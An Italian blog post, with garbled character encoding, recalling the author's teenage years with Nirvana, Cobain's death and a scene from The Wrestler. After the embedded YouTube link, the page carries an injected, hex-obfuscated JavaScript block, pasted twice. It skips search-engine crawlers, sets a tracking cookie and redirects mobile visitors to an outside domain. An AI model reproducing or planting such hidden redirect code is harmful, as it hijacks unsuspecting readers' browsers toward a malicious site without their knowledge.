Home / Cultura / Musica / From the Muddy Banks of the Liri

From the Muddy Banks of the Liri

La prima volta che sentii parlare dei Nirvana fu nel 1991. Io ero un alieno, la cultura non era unai??i??opinione, Ministro del Bilancio e programmazione economica di allora era Paolo Cirino Pomicino. Forse anche per questo, mio fratello tornA? a casa un pomeriggio dopo essere passato da Disco Augusto a Frosinone, recando seco questo disco raffigurante un simpatico infante immerso nellai??i??acqua, intento ad afferrare una banconota. Quellai??i??album allai??i??epoca costA? qualcosa come 27.900 lire. Ancora non sapevo che lai??i??estate successiva lo avrei letteralmente consumato, ma non in versione cd. Mi feci registrare su di una cassetta, credo fosse una TDK, i Metallica del Black Album sul lato A e nel lato B optai per Nevermind. Me ne frego. Termine che allai??i??epoca e, forse anche piA? oggi, fa un poai??i?? paura. Evidentemente me ne fregavo anche io di parecchie cose. Anche del gusto nellai??i??associazione tra due band che, oggettivamente, non cai??i??entravano un cazzo lai??i??una con lai??i??altra. Con il tempo perA? iniziai a capire che quella contrapposizione, avrebbe rappresentato molto. La prima cosa da cui venni colpito furono senza dubbio lai??i??energia e la potenza di quelle chitarre distorte, lai??i??impeto del basso elettrico di quel Cristo di Novoselic e lai??i??irruenza della batteria di quello che sarebbe poi diventato una gran puttana del rock. CiA? che perA? mi affascinava di piA? era il modo sgraziato di cantare di questo biondo emaciato dagli occhi spenti che si firmava Kurtd. Una volta, probabilmente stavo ascoltando Breed, mia nonna cercA? di comunicare, invano, con me che, concentrato sullai??i??ascolto del trio di Seattle, non riuscivo a sentirla. Finita la canzone la sentii esclamare: ai???Che cazz!!!! Gli can arrraiat!!!ai??? Che nella nostra lingua avrebbe dovuto significare qualcosa tipo: ai???Non ti sembra, rispettabile nipote, che il volume del tuo ripetitore analogico sia posto al di sopra della normale soglia di tollerabilitAi??? Tale da configurare una delle ipotesi di immissione di cui allai??i??art. 844 del Codice Civile? Mantenendo un tale stato di cose potresti altresAi?? recare nocumento al tuo apparato uditivo! Ti prego, orsA?, modera i tuoi costumi e rinsavisci verso la pace dei sensi, verso il Nirvanaai???. Granma (take me home) aveva capito tutto. Kurt Cobain cantava come un cane rabbioso. Era questo quello che mi piaceva piA? di tutto. La rabbia. Il dolore. La spontaneitAi?? di quelle canzoni. Allai??i??epoca non riuscivo a capire da cosa venisse fuori. E, sicuramente, non capivo un emerito cazzo dei testi che Cobain urlava con tutta la sua passione. Il tempo passava e i miei capelli iniziavano a crescere, senza che io potessi impedirlo. In tv alcune trasmissioni della RAI, acronimo di Radio Atelevisione Italiana, ti offrivano, oltre ad una buona dose Pippo Baudo, la possibilitAi?? di vedere e di sentire cose interessanti. Una sera, credo fosse giAi?? il 1993/1994, a Tunnel, programma della terza rete comunista, una nota presentatrice televisiva tuttai??i??ora in auge, invitA? il trio di Seattle. Non mi piacquero o, comunque, non prestai grande attenzione allai??i??evento. Non avevo comprato In Utero e giAi?? in me iniziava ad insidiarsi il seme del rock progressivo che avrebbe caratterizzato i miei ascolti negli anni successivi (lo so, nessuno A? perfetto). Tuttavia, malgrado tali ai???contaminazioniai??? la mattina del 05 aprile del 1994 ero a casa malato. Appresi la notizia della morte di Kobain dal telegiornale della seconda rete socialista. Lai??i??evento mi turbA? molto. Era la prima rock star dellai??i??immaginario collettivo che, seppure in senso figurato, vedevo morire sotto i miei occhi. Mi sembrava essere parte della storia. Anche a me, giovine rampollo di un paese posto non sulle rive fangose del fiume WishKah, ma delle contaminate acque del Liri. Kurt Cobain se ne era andato sparandosi un colpo di fucile, dopo essersi ai???sparatoai??? in quegli anni una serie indeterminata di droghe in corpo. Da quel giorno perA? iniziai ad avvertire quel senso comune di ai??i?? non so se A? rispetto o qualcosa di simileai??i??timore reverenziale (termine che con molta probabilitAi?? devo aver sentito da Bruno Pizzul durante una partita di coppa Uefa) che normalmente si riconosce ai morti. UscAi?? lai??i??unplugged ed io che giAi?? mi dilettavo con il metodo Gangi o i 120 arpeggi di Mauro Giuliani, me la tiravo un sacco, durante le gite, dimostrando di saper suonare con scioltezza brani come dumb, on a plain, where did you sleep last night etc. I Nirvana ormai erano conosciuti e apprezzati da tutti e questo, purtroppo, dava fastidio al mio integralismo adolescenziale. Iniziai a non sopportarli piA?. Durante tutte le manifestazioni musicali cui partecipavo con i vari complessi, cai??i??era sempre qualcuno che suonava, molto male, Smells like teen spirit oppure Come as you are. Quasi per rigetto eseguivamo cose diametralmente opposte: Le Orme, il Banco, il Rovescio della Medaglia, la PFM. Quasi a voler essere volutamente anacronistici. Non capivo che io, nel mio piccolo, facevo la stessa cosa di Cobain. Rompevo, oltre che le palle di chi ci veniva a sentire suonare, anche gli schemi di chi proponeva il groove del momento. In un periodo in cui il rock era caratterizzato dalla mascolinitAi?? misogina di band come i Guns and Roses, dalla fisicitAi?? e dai muscoli dei Metallica, dai capelli cotonati, da insopportabili guitar hero dediti a dimostrare in ogni brano, per almeno 40 secondi, quanto fossero bravi con il tapping, da martorianti assoli di batteria alla Tommy Lee, i Nirvana rispondevano con: camicie di flanella da montanaro, capelli lunghi, non curati e, spesso, sporchi, brani di breve durata e senza fronzoli, dubbi esistenziali, paure, debolezze, intimitAi??. Chi ha saputo meglio riassumere questa differenza ontologica in poche parole A? stato Mickey Rourke in una scena del film The Wrestler di Darren Aronofsky, in cui, rivolgendosi ad una accattivante Marisa Tomei con sottofondo un brano degli insopportabili Ratt, ha il coraggio di ammettere: ai???cazzo non ne fanno piA? di canzoni cosAi??, mitici anni 80 imbattibili: i Guns N’ Roses,i Motley Crue, Def Leppard poi Cobain quel finocchio A? arrivato lui e ha rovinato tuttoai???. Con il tempo, contrariamente a quanto sostenuto dal sopramenzionato Randy ai???The Ramai??? Robinson iniziai a capire che ai???potremmo avere di piA?, la Natura A? una puttana e forse sono solo troppo colpevole per quello che ho sentito ma non sono sicuro. Sono stato fortunato ad averti conosciuto. Non mi importa di quello che pensi, finchAi?? non riguarda me. Amo me stesso piA? di te
lo so che A? sbagliato, ma che dovrei fare? Sono su un piano, non mi posso lamentare. Dio A? gay, brucia la bandiera. Oh sAi??, credo che questo mi faccia sorridere. L’ho trovato difficile, A? stato difficile da trovare. Oh, bAi??, comunque, non ti preoccupare. Non mi preoccupo, se sono vecchio. Non mi importa se non ho una menteai???
Peace, Love, Empathy.

Scena tratta dal film “The Wrestler”.

http://www.youtube.com/watch?v=ND1_Sc17SGEvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

From the Muddy Banks of the Liri
5 (100%) 1 vote

Commenti

commenti

Pubblicità

Notizie su White Riot

White Riot

Rispondi

Il tuo indirizzo eMail non sarà Pubblicato.I campi obbligatori sono contrassegnati. *

*

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.